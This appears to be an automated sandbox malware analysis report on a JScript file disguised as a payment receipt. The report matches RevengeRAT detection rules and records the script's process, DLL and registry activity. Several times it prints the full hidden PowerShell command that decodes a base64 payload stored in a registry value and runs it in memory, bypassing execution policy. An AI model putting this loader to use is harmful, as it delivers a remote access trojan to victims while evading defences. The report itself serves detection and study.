            Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.1768164d990.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 1.2.powershell.exe.176f6380000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.176f6380000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.17680368c20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.17680368c20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 1.2.powershell.exe.1768164d990.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 00000001.00000002.2981058808.00000176F6380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RevengeRAT author = ditekSHen, description = RevengeRAT and variants payload, snort_sid = 920000-920002
            Source: 00000001.00000002.2959069281.0000017681597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: 00000001.00000002.2959069281.00000176801B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Revengerat_db91bcc6 reference_sample = 30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Revengerat, fingerprint = 9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666, id = db91bcc6-024d-42da-8d0a-bd69374bf622, last_modified = 2022-01-13
            Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.expl.evad.winJS@4/3@0/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\9822cb7521c94057
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_26550411
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1rgfjrx.rvg.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\comprovante de pagamento.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            JScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$", "0", "false");
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8BD1AA pushad ; ret 1_2_00007FFD9B8BD1B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B8153 push ebx; ret 1_2_00007FFD9B8B816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B0952 push E95AD1D0h; ret 1_2_00007FFD9B8B09C9
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
